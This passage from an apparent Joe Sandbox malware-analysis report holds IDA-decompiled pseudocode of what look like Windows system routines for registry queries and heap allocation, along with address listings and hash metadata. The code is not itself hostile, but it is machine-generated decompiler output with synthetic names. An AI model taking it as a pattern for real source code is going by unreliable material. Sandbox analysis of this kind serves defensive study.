							_t192 =  *_t165 +  *((intOrPtr*)(_t165 - 4));
							if(_t192 > _t200) {
								_t200 = _t192;
							}
						}
						_t165 = _t165 + 0x28;
						_t194 = _t194 - 1;
					} while (_t194 != 0);
					_t183 = _v104;
					goto L7;
				}
			}
















































                                                                                                                              0x1d7c174b
                                                                                                                              0x1d7c1762
                                                                                                                              0x1d7c1765
                                                                                                                              0x1d7c176b
                                                                                                                              0x1d7c176d
                                                                                                                              0x1d7c1771
                                                                                                                              0x1d7c1774
                                                                                                                              0x1d7c1778
                                                                                                                              0x1d7c177e
                                                                                                                              0x1d7c179f
                                                                                                                              0x1d7c179f
                                                                                                                              0x1d7c17a7
                                                                                                                              0x1d7c17de
                                                                                                                              0x1d7c17de
                                                                                                                              0x1d7c17e6
                                                                                                                              0x1d7c17ee
                                                                                                                              0x1d7c17f2
                                                                                                                              0x1d7c17f4
                                                                                                                              0x1d7c17f4
                                                                                                                              0x1d7c17f2
                                                                                                                              0x1d7c17f6
                                                                                                                              0x1d7c17f8
                                                                                                                              0x1d7c17fe
                                                                                                                              0x1d7c17ff
                                                                                                                              0x1d7c1801
                                                                                                                              0x1d7c180a
                                                                                                                              0x1d7c1a8a
                                                                                                                              0x1d7c1a92
                                                                                                                              0x1d7c1810
                                                                                                                              0x1d7c1810
                                                                                                                              0x1d7c181d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c182c
                                                                                                                              0x1d7c1831
                                                                                                                              0x1d7c183b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1841
                                                                                                                              0x1d7c184a
                                                                                                                              0x1d7c184f
                                                                                                                              0x1d7c1854
                                                                                                                              0x1d7c1856
                                                                                                                              0x1d7c185e
                                                                                                                              0x1d7c1860
                                                                                                                              0x1d7c1865
                                                                                                                              0x1d7c186d
                                                                                                                              0x1d7c186e
                                                                                                                              0x1d7c1877
                                                                                                                              0x1d7c187f
                                                                                                                              0x1d7c1887
                                                                                                                              0x1d7c1a75
                                                                                                                              0x1d7c1a85
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1a85
                                                                                                                              0x1d7c1896
                                                                                                                              0x1d7c189a
                                                                                                                              0x1d7c189e
                                                                                                                              0x1d7c18a6
                                                                                                                              0x1d7c18a9
                                                                                                                              0x1d7c18aa
                                                                                                                              0x1d7c18af
                                                                                                                              0x1d7c18b4
                                                                                                                              0x1d7c18b5
                                                                                                                              0x1d7c18b6
                                                                                                                              0x1d7c18b7
                                                                                                                              0x1d7c18b8
                                                                                                                              0x1d7c18c3
                                                                                                                              0x1d7c1a6c
                                                                                                                              0x1d7c1a6c
                                                                                                                              0x1d7c1a70
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1a70
                                                                                                                              0x1d7c18c9
                                                                                                                              0x1d7c18d2
                                                                                                                              0x1d7c18db
                                                                                                                              0x1d7c197f
                                                                                                                              0x1d7c1984
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1993
                                                                                                                              0x1d7c1999
                                                                                                                              0x1d7c199a
                                                                                                                              0x1d7c199b
                                                                                                                              0x1d7c19a1
                                                                                                                              0x1d7c19a5
                                                                                                                              0x1d7c19aa
                                                                                                                              0x1d7c19ab
                                                                                                                              0x1d7c19ac
                                                                                                                              0x1d7c19ad
                                                                                                                              0x1d7c19ae
                                                                                                                              0x1d7c19b9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c19c3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c19c5
                                                                                                                              0x1d7c19c9
                                                                                                                              0x1d7c19d3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c19d9
                                                                                                                              0x1d7c19e3
                                                                                                                              0x1d7c19e4
                                                                                                                              0x1d7c19e5
                                                                                                                              0x1d7c19ea
                                                                                                                              0x1d7c19ee
                                                                                                                              0x1d7c19f3
                                                                                                                              0x1d7c19f4
                                                                                                                              0x1d7c19f5
                                                                                                                              0x1d7c19f6
                                                                                                                              0x1d7c19f7
                                                                                                                              0x1d7c1a02
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c18ec
                                                                                                                              0x1d7c18f1
                                                                                                                              0x1d7c18f2
                                                                                                                              0x1d7c18fa
                                                                                                                              0x1d7c18fb
                                                                                                                              0x1d7c1901
                                                                                                                              0x1d7c1905
                                                                                                                              0x1d7c190a
                                                                                                                              0x1d7c190b
                                                                                                                              0x1d7c190c
                                                                                                                              0x1d7c190d
                                                                                                                              0x1d7c190e
                                                                                                                              0x1d7c1919
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1923
                                                                                                                              0x1d7c1a0a
                                                                                                                              0x1d7c1a0e
                                                                                                                              0x1d7c1a10
                                                                                                                              0x1d7c1a1a
                                                                                                                              0x1d7c1a1e
                                                                                                                              0x1d7c1a25
                                                                                                                              0x1d7c1a2b
                                                                                                                              0x1d7c1a33
                                                                                                                              0x1d7c1a34
                                                                                                                              0x1d7c1a39
                                                                                                                              0x1d7c1a3e
                                                                                                                              0x1d7c1a3f
                                                                                                                              0x1d7c1a48
                                                                                                                              0x1d7c1a4a
                                                                                                                              0x1d7c1a52
                                                                                                                              0x1d7c1a56
                                                                                                                              0x1d7c1a57
                                                                                                                              0x1d7c1a5f
                                                                                                                              0x1d7c1a64
                                                                                                                              0x1d7c1a65
                                                                                                                              0x1d7c1a67
                                                                                                                              0x1d7c1a67
                                                                                                                              0x1d7c1a48
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1a1e
                                                                                                                              0x1d7c1929
                                                                                                                              0x1d7c192d
                                                                                                                              0x1d7c1934
                                                                                                                              0x1d7c1939
                                                                                                                              0x1d7c197b
                                                                                                                              0x1d7c197b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c197b
                                                                                                                              0x1d7c193d
                                                                                                                              0x1d7c1941
                                                                                                                              0x1d7c1946
                                                                                                                              0x1d7c194a
                                                                                                                              0x1d7c194b
                                                                                                                              0x1d7c1950
                                                                                                                              0x1d7c1955
                                                                                                                              0x1d7c1956
                                                                                                                              0x1d7c1957
                                                                                                                              0x1d7c1958
                                                                                                                              0x1d7c1959
                                                                                                                              0x1d7c1964
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c196e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1974
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1974
                                                                                                                              0x1d7c18db
                                                                                                                              0x1d7c180a
                                                                                                                              0x1d7c17af
                                                                                                                              0x1d7c17b5
                                                                                                                              0x1d7c17b8
                                                                                                                              0x1d7c17bc
                                                                                                                              0x1d7c17da
                                                                                                                              0x1d7c17da
                                                                                                                              0x00000000
                                                                                                                              0x1d7c17da
                                                                                                                              0x1d7c17be
                                                                                                                              0x1d7c17c1
                                                                                                                              0x1d7c17c5
                                                                                                                              0x1d7c17c9
                                                                                                                              0x1d7c17ce
                                                                                                                              0x1d7c17d0
                                                                                                                              0x1d7c17d0
                                                                                                                              0x1d7c17ce
                                                                                                                              0x1d7c17d2
                                                                                                                              0x1d7c17d5
                                                                                                                              0x1d7c17d5
                                                                                                                              0x00000000
                                                                                                                              0x1d7c1780
                                                                                                                              0x1d7c1780
                                                                                                                              0x1d7c1782
                                                                                                                              0x1d7c1786
                                                                                                                              0x1d7c178a
                                                                                                                              0x1d7c178f
                                                                                                                              0x1d7c1791
                                                                                                                              0x1d7c1791
                                                                                                                              0x1d7c178f
                                                                                                                              0x1d7c1793
                                                                                                                              0x1d7c1796
                                                                                                                              0x1d7c1796
                                                                                                                              0x1d7c179b
                                                                                                                              0x00000000
                                                                                                                              0x1d7c179b

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$AddD
                                                                                                                              • API String ID: 0-2525844869
                                                                                                                              • Opcode ID: 4f99a027bf297e8f644d4bcd6767b35e400644f24aece60497b8d51adb0599ed
                                                                                                                              • Instruction ID: ae195fd195a1f662a20c946aaeb0f7efc2d6270acd5675cb105493e58b16fdc3
                                                                                                                              • Opcode Fuzzy Hash: 4f99a027bf297e8f644d4bcd6767b35e400644f24aece60497b8d51adb0599ed
                                                                                                                              • Instruction Fuzzy Hash: FDA15976208345AFE315CB14D885BABB7E9FF84724F104B2EF99587250E770E905CB62
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D775BE0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 87%
                                                                                                                              			E1D775BE0(intOrPtr _a4, char* _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, unsigned int _a24, unsigned int* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				short _v48;
				char _v52;
				unsigned int _v56;
				intOrPtr _v60;
				signed int _t72;
				signed int _t81;
				intOrPtr _t89;
				void* _t90;
				unsigned int* _t91;
				unsigned int* _t102;
				intOrPtr _t106;
				short _t113;
				unsigned int _t117;
				void* _t119;
				intOrPtr* _t120;
				unsigned int _t123;
				unsigned int _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t131;
				short _t134;
				signed int _t137;
				signed int _t139;
				void* _t140;
				void* _t141;
				void* _t148;

				_t72 = _a16;
				_t113 = 0;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_t134 = 0;
				if(_t72 != 0) {
					if(_t72 == 1) {
						goto L1;
					}
					_t81 = 0xc00000f1;
					L14:
					return _t81;
				}
				L1:
				_t148 =  *0x1d836618 - _t113; // 0x1
				if(_t148 == 0) {
					_v28 = 0x18;
					_v20 = 0x1d711750 + _t72 * 8;
					_push( &_v28);
					_push(0x20019);
					_v24 = _t113;
					_push( &_v52);
					_v16 = 0x40;
					_v12 = _t113;
					_v8 = _t113;
					_t137 = E1D782AB0();
					if(_t137 != 0xc0000034) {
						if(_t137 < 0) {
							goto L10;
						}
						E1D785050(_t119,  &_v36, _a4);
						_v32 = _v60;
						_v28 =  &_v44;
						_push( &_v36);
						_push(0x20019);
						_v36 = 0x18;
						_push( &_v56);
						_v24 = 0x40;
						_v20 = _t113;
						_v16 = _t113;
						_t137 = E1D782AB0();
						if(_t137 == 0xc0000034) {
							goto L3;
						}
						if(_t137 < 0) {
							goto L10;
						}
						_t93 = _a8;
						if(_a8 == 0) {
							_t93 = L"TargetPath";
						}
						E1D785050(_t119,  &_v36, _t93);
						_t41 = _a24 + 0x10; // 0x10
						_t140 = _t41;
						if(_t140 >= _a24) {
							_t134 = E1D755D90(_t119,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t140);
							if(_t134 != 0) {
								_push( &_v56);
								_push(_t140);
								_push(_t134);
								_push(2);
								_push( &_v36);
								_push(_v48);
								_t137 = E1D782B00();
								if(_t137 < 0) {
									if(_t137 != 0x80000005) {
										goto L54;
									}
									L35:
									_t124 =  *(_t134 + 8);
									_t49 = _t134 + 0xc; // 0xc
									_t131 = _t49;
									_v56 = _t124;
									if(_t137 < 0) {
										L50:
										_t102 = _a28;
										if(_t102 != 0) {
											 *_t102 = _t124;
										}
										if(_t137 >= 0) {
											E1D7888C0(_a20, _t131, _t124);
										}
										goto L54;
									}
									_t117 = _a24;
									if( *((intOrPtr*)(_t131 + (_t124 >> 1) * 2 - 2)) != 0) {
										_t124 = _t124 + 2;
										_v56 = _t124;
										if(_t117 < _t124) {
											_t137 = 0x80000005;
										} else {
											 *((short*)(_t131 + (_t124 >> 1) * 2 - 2)) = 0;
											_t124 = _v56;
										}
									}
									if(_t137 < 0 ||  *((intOrPtr*)(_t134 + 4)) != 2) {
										goto L50;
									} else {
										_t125 = _t131;
										_t61 = _t125 + 2; // 0xe
										_t141 = _t61;
										do {
											_t106 =  *_t125;
											_t125 = _t125 + 2;
										} while (_t106 != _v44);
										_t113 = 0;
										_t137 = E1D76C3D0(0, _t131, _t125 - _t141 >> 1, _a20, _t117 >> 1,  &_v40);
										if(_t137 >= 0 || _t137 == 0xc0000023) {
											_t128 = _a28;
											if(_t128 != 0) {
												 *_t128 = _v40 + _v40;
											}
											if(_t137 == 0xc0000023) {
												_t137 = 0x80000005;
											}
										}
										goto L10;
									}
								}
								if( *((intOrPtr*)(_t134 + 4)) == 1 ||  *((intOrPtr*)(_t134 + 4)) == 2) {
									goto L35;
								} else {
									_t137 = 0xc0000024;
									goto L54;
								}
							}
							_t137 = 0xc0000017;
							goto L54;
						} else {
							_t137 = 0xc0000095;
							L54:
							_t113 = 0;
							goto L10;
						}
					}
					 *0x1d836618 = 1;
					goto L3;
				} else {
					_t137 = 0xc0000034;
					L3:
					_t130 = _a12;
					if(_t130 == 0) {
						L10:
						if(_v52 != 0) {
							_push(_v52);
							E1D782A80();
						}
						if(_v48 != 0) {
							_push(_v48);
							E1D782A80();
						}
						if(_t134 != 0) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t113, _t134);
						}
						_t81 = _t137;
						goto L14;
					} else {
						_t120 = _t130;
						_t139 = _t120 + 2;
						goto L5;
						L5:
						_t89 =  *_t120;
						_t120 = _t120 + 2;
						if(_t89 != _t113) {
							goto L5;
						} else {
							_t90 = (_t120 - _t139 >> 1) + 1;
							_t123 = _t90 + _t90;
							_v56 = _t123;
							if(_t123 < _t90) {
								_t137 = 0xc0000095;
							} else {
								_t91 = _a28;
								asm("sbb esi, esi");
								_t137 = _t139 & 0x80000005;
								if(_t91 != 0) {
									 *_t91 = _t123;
								}
								if(_t123 <= _a24) {
									E1D7888C0(_a20, _t130, _t123);
								}
							}
							goto L10;
						}
					}
				}
			}








































                                                                                                                              0x1d775beb
                                                                                                                              0x1d775bef
                                                                                                                              0x1d775bf1
                                                                                                                              0x1d775bf5
                                                                                                                              0x1d775bf9
                                                                                                                              0x1d775bff
                                                                                                                              0x1d775c03
                                                                                                                              0x1d775cf0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d775cf6
                                                                                                                              0x1d775c8b
                                                                                                                              0x1d775c91
                                                                                                                              0x1d775c91
                                                                                                                              0x1d775c09
                                                                                                                              0x1d775c09
                                                                                                                              0x1d775c0f
                                                                                                                              0x1d775c9f
                                                                                                                              0x1d775ca7
                                                                                                                              0x1d775caf
                                                                                                                              0x1d775cb0
                                                                                                                              0x1d775cb9
                                                                                                                              0x1d775cbd
                                                                                                                              0x1d775cbe
                                                                                                                              0x1d775cc6
                                                                                                                              0x1d775cca
                                                                                                                              0x1d775cd3
                                                                                                                              0x1d775cdb
                                                                                                                              0x1d7b3a63
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3a71
                                                                                                                              0x1d7b3a7a
                                                                                                                              0x1d7b3a82
                                                                                                                              0x1d7b3a8a
                                                                                                                              0x1d7b3a8b
                                                                                                                              0x1d7b3a94
                                                                                                                              0x1d7b3a9c
                                                                                                                              0x1d7b3a9d
                                                                                                                              0x1d7b3aa5
                                                                                                                              0x1d7b3aa9
                                                                                                                              0x1d7b3ab2
                                                                                                                              0x1d7b3aba
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3ac2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3ac8
                                                                                                                              0x1d7b3acd
                                                                                                                              0x1d7b3acf
                                                                                                                              0x1d7b3acf
                                                                                                                              0x1d7b3ada
                                                                                                                              0x1d7b3ae2
                                                                                                                              0x1d7b3ae2
                                                                                                                              0x1d7b3ae7
                                                                                                                              0x1d7b3b0f
                                                                                                                              0x1d7b3b13
                                                                                                                              0x1d7b3b23
                                                                                                                              0x1d7b3b24
                                                                                                                              0x1d7b3b25
                                                                                                                              0x1d7b3b26
                                                                                                                              0x1d7b3b2c
                                                                                                                              0x1d7b3b2d
                                                                                                                              0x1d7b3b36
                                                                                                                              0x1d7b3b3a
                                                                                                                              0x1d7b3b58
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3b5e
                                                                                                                              0x1d7b3b5e
                                                                                                                              0x1d7b3b61
                                                                                                                              0x1d7b3b61
                                                                                                                              0x1d7b3b64
                                                                                                                              0x1d7b3b6a
                                                                                                                              0x1d7b3c08
                                                                                                                              0x1d7b3c08
                                                                                                                              0x1d7b3c0d
                                                                                                                              0x1d7b3c0f
                                                                                                                              0x1d7b3c0f
                                                                                                                              0x1d7b3c13
                                                                                                                              0x1d7b3c1a
                                                                                                                              0x1d7b3c1f
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3c13
                                                                                                                              0x1d7b3b7b
                                                                                                                              0x1d7b3b7e
                                                                                                                              0x1d7b3b80
                                                                                                                              0x1d7b3b83
                                                                                                                              0x1d7b3b89
                                                                                                                              0x1d7b3b9a
                                                                                                                              0x1d7b3b8b
                                                                                                                              0x1d7b3b8f
                                                                                                                              0x1d7b3b94
                                                                                                                              0x1d7b3b94
                                                                                                                              0x1d7b3b89
                                                                                                                              0x1d7b3ba1
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3ba9
                                                                                                                              0x1d7b3ba9
                                                                                                                              0x1d7b3bab
                                                                                                                              0x1d7b3bab
                                                                                                                              0x1d7b3bae
                                                                                                                              0x1d7b3bae
                                                                                                                              0x1d7b3bb1
                                                                                                                              0x1d7b3bb4
                                                                                                                              0x1d7b3bc8
                                                                                                                              0x1d7b3bd4
                                                                                                                              0x1d7b3bdd
                                                                                                                              0x1d7b3be7
                                                                                                                              0x1d7b3bec
                                                                                                                              0x1d7b3bf4
                                                                                                                              0x1d7b3bf4
                                                                                                                              0x1d7b3bf8
                                                                                                                              0x1d7b3bfe
                                                                                                                              0x1d7b3bfe
                                                                                                                              0x1d7b3bf8
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3bdd
                                                                                                                              0x1d7b3ba1
                                                                                                                              0x1d7b3b40
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3b48
                                                                                                                              0x1d7b3b48
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3b48
                                                                                                                              0x1d7b3b40
                                                                                                                              0x1d7b3b15
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3ae9
                                                                                                                              0x1d7b3ae9
                                                                                                                              0x1d7b3c22
                                                                                                                              0x1d7b3c22
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3c22
                                                                                                                              0x1d7b3ae7
                                                                                                                              0x1d775ce1
                                                                                                                              0x00000000
                                                                                                                              0x1d775c15
                                                                                                                              0x1d775c15
                                                                                                                              0x1d775c1a
                                                                                                                              0x1d775c1a
                                                                                                                              0x1d775c1f
                                                                                                                              0x1d775c6b
                                                                                                                              0x1d775c70
                                                                                                                              0x1d7b3c29
                                                                                                                              0x1d7b3c2d
                                                                                                                              0x1d7b3c2d
                                                                                                                              0x1d775c7b
                                                                                                                              0x1d7b3c37
                                                                                                                              0x1d7b3c3b
                                                                                                                              0x1d7b3c3b
                                                                                                                              0x1d775c83
                                                                                                                              0x1d7b3c50
                                                                                                                              0x1d7b3c50
                                                                                                                              0x1d775c89
                                                                                                                              0x00000000
                                                                                                                              0x1d775c21
                                                                                                                              0x1d775c21
                                                                                                                              0x1d775c23
                                                                                                                              0x1d775c23
                                                                                                                              0x1d775c26
                                                                                                                              0x1d775c26
                                                                                                                              0x1d775c29
                                                                                                                              0x1d775c2f
                                                                                                                              0x00000000
                                                                                                                              0x1d775c31
                                                                                                                              0x1d775c35
                                                                                                                              0x1d775c38
                                                                                                                              0x1d775c3b
                                                                                                                              0x1d775c41
                                                                                                                              0x1d7b3af3
                                                                                                                              0x1d775c47
                                                                                                                              0x1d775c4a
                                                                                                                              0x1d775c4d
                                                                                                                              0x1d775c4f
                                                                                                                              0x1d775c57
                                                                                                                              0x1d775c94
                                                                                                                              0x1d775c94
                                                                                                                              0x1d775c5c
                                                                                                                              0x1d775c63
                                                                                                                              0x1d775c68
                                                                                                                              0x1d775c5c
                                                                                                                              0x00000000
                                                                                                                              0x1d775c41
                                                                                                                              0x1d775c2f
                                                                                                                              0x1d775c1f

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$TargetPath
                                                                                                                              • API String ID: 0-4164548946
                                                                                                                              • Opcode ID: 3e2a9313947fd39609e884d0698e914d0440f3c08549f0c34f6f0fac52e4e2f7
                                                                                                                              • Instruction ID: beede72dd8aee130eb3cd9da65c7aa85ccb5076264d57e47d1c53cfc43b89761
                                                                                                                              • Opcode Fuzzy Hash: 3e2a9313947fd39609e884d0698e914d0440f3c08549f0c34f6f0fac52e4e2f7
                                                                                                                              • Instruction Fuzzy Hash: 8181CD719046969FCB11CF18C884A6BB7A4FF84728F068A2FED4997250D331ED85CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7D5930 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 50%
                                                                                                                              			E1D7D5930(void* __ecx, char __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				char _v152;
				intOrPtr _v156;
				char _v164;
				char _v172;
				char _v184;
				char _v188;
				char _v196;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				char* _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				char _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t113;
				void* _t114;
				intOrPtr* _t118;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr _t129;
				void* _t130;
				void* _t131;
				intOrPtr _t132;
				signed int _t133;

				_t123 = __edx;
				_t135 = (_t133 & 0xfffffff8) - 0xe4;
				_v8 =  *0x1d83b370 ^ (_t133 & 0xfffffff8) - 0x000000e4;
				_t129 = _a4;
				_t126 = _a12;
				_t112 = 0;
				_v224 = 0xc;
				E1D785050(__ecx,  &_v172, 0);
				E1D785050(__ecx,  &_v188, L"RXACT");
				_v224 = 0x18;
				_v216 =  &_v196;
				_push( &_v228);
				_push(0);
				_push(0);
				_push(0);
				_v220 = _t129;
				_push( &_v224);
				_push(0x3001f);
				_v212 = 0xc0;
				_push( &_v248);
				_v208 = 0;
				_v204 = 0;
				if(E1D782B80() >= 0) {
					_t118 = E1D755D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x10);
					 *_t126 = _t118;
					if(_t118 != 0) {
						_t123 = 1;
						 *_t118 = _t129;
						 *((char*)(_t118 + 8)) = 1;
						 *((intOrPtr*)(_t118 + 0xc)) = 0;
						 *((intOrPtr*)(_t118 + 4)) = _v232;
						if(_v212 != 1) {
							_push( &_v164);
							_t131 = E1D7FD430(_t118, _v232,  &_v184,  &_v152,  &_v224);
							if(_t131 < 0) {
								goto L7;
							} else {
								if(_v228 != 0xc || _v156 != 1) {
									_t131 = 0xc0000058;
									goto L7;
								} else {
									E1D785050(_t118,  &_v224, L"Log");
									_push( &_v240);
									_push(0x80);
									_push( &_v152);
									_push(0);
									_push( &_v232);
									_push(_v244);
									if(E1D782B00() < 0) {
										_t72 = 0;
									} else {
										if(_a8 == 0) {
											_t72 = 0x80000018;
										} else {
											_push( &_v232);
											_push(0);
											_push(0);
											_push(1);
											_push( &_v224);
											_push(_v236);
											if(E1D782B00() == 0xc0000023) {
												_t132 = E1D755D90(_t118,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v232);
												if(_t132 == 0) {
													goto L3;
												} else {
													_push( &_v232);
													_push(_v232);
													_push(_t132);
													_push(1);
													_push( &_v224);
													_push(_v236);
													_t114 = E1D782B00();
													if(_t114 < 0) {
														L20:
														E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t132);
														_t131 = _t114;
														_t112 = 0;
														goto L8;
													} else {
														 *((intOrPtr*)( *_t126 + 0xc)) =  *((intOrPtr*)(_t132 + 8)) + _t132;
														 *((char*)( *_t126 + 8)) = 0;
														_t114 = E1D7D54AB( *_t126);
														if(_t114 >= 0) {
															_push( &_v224);
															_push(_v236);
															E1D783710();
															 *((intOrPtr*)( *_t126 + 0xc)) = _t132;
															_t72 = E1D7D5660( *_t126);
														} else {
															goto L20;
														}
													}
												}
											}
										}
									}
								}
							}
						} else {
							_push(0xc);
							_v152 = 1;
							_push( &_v152);
							_push(0);
							_push(0);
							_push( &_v172);
							_push(_v232);
							_t131 = E1D782FB0();
							if(_t131 >= 0) {
								_t72 = 0x40000004;
							} else {
								_push(_v232);
								E1D7836E0();
								L7:
								_push(_v236);
								E1D782A80();
								L8:
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t112,  *_t126);
								_t72 = _t131;
							}
						}
					} else {
						_push(_v232);
						E1D7836E0();
						_push(_v236);
						E1D782A80();
						L3:
						_t72 = 0xc0000017;
					}
				}
				_pop(_t127);
				_pop(_t130);
				_pop(_t113);
				return E1D784B50(_t72, _t113, _v8 ^ _t135, _t123, _t127, _t130);
			}




































                                                                                                                              0x1d7d5930
                                                                                                                              0x1d7d5938
                                                                                                                              0x1d7d5945
                                                                                                                              0x1d7d594e
                                                                                                                              0x1d7d5956
                                                                                                                              0x1d7d5959
                                                                                                                              0x1d7d595d
                                                                                                                              0x1d7d5965
                                                                                                                              0x1d7d5974
                                                                                                                              0x1d7d597d
                                                                                                                              0x1d7d5985
                                                                                                                              0x1d7d598d
                                                                                                                              0x1d7d598e
                                                                                                                              0x1d7d598f
                                                                                                                              0x1d7d5990
                                                                                                                              0x1d7d5995
                                                                                                                              0x1d7d5999
                                                                                                                              0x1d7d599a
                                                                                                                              0x1d7d59a3
                                                                                                                              0x1d7d59ab
                                                                                                                              0x1d7d59ac
                                                                                                                              0x1d7d59b0
                                                                                                                              0x1d7d59bb
                                                                                                                              0x1d7d59d2
                                                                                                                              0x1d7d59d4
                                                                                                                              0x1d7d59d8
                                                                                                                              0x1d7d59fc
                                                                                                                              0x1d7d59fd
                                                                                                                              0x1d7d59ff
                                                                                                                              0x1d7d5a02
                                                                                                                              0x1d7d5a05
                                                                                                                              0x1d7d5a0c
                                                                                                                              0x1d7d5a67
                                                                                                                              0x1d7d5a80
                                                                                                                              0x1d7d5a84
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5a86
                                                                                                                              0x1d7d5a8b
                                                                                                                              0x1d7d5a94
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5a9b
                                                                                                                              0x1d7d5aa5
                                                                                                                              0x1d7d5aae
                                                                                                                              0x1d7d5aaf
                                                                                                                              0x1d7d5ab8
                                                                                                                              0x1d7d5ab9
                                                                                                                              0x1d7d5abe
                                                                                                                              0x1d7d5abf
                                                                                                                              0x1d7d5aca
                                                                                                                              0x1d7d5b93
                                                                                                                              0x1d7d5ad0
                                                                                                                              0x1d7d5ad3
                                                                                                                              0x1d7d5b8c
                                                                                                                              0x1d7d5ad9
                                                                                                                              0x1d7d5add
                                                                                                                              0x1d7d5ade
                                                                                                                              0x1d7d5adf
                                                                                                                              0x1d7d5ae0
                                                                                                                              0x1d7d5ae6
                                                                                                                              0x1d7d5ae7
                                                                                                                              0x1d7d5af5
                                                                                                                              0x1d7d5b0e
                                                                                                                              0x1d7d5b12
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5b18
                                                                                                                              0x1d7d5b1c
                                                                                                                              0x1d7d5b1d
                                                                                                                              0x1d7d5b25
                                                                                                                              0x1d7d5b26
                                                                                                                              0x1d7d5b28
                                                                                                                              0x1d7d5b29
                                                                                                                              0x1d7d5b32
                                                                                                                              0x1d7d5b36
                                                                                                                              0x1d7d5b55
                                                                                                                              0x1d7d5b62
                                                                                                                              0x1d7d5b67
                                                                                                                              0x1d7d5b69
                                                                                                                              0x00000000
                                                                                                                              0x1d7d5b38
                                                                                                                              0x1d7d5b3f
                                                                                                                              0x1d7d5b44
                                                                                                                              0x1d7d5b4f
                                                                                                                              0x1d7d5b53
                                                                                                                              0x1d7d5b74
                                                                                                                              0x1d7d5b75
                                                                                                                              0x1d7d5b79
                                                                                                                              0x1d7d5b80
                                                                                                                              0x1d7d5b85
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
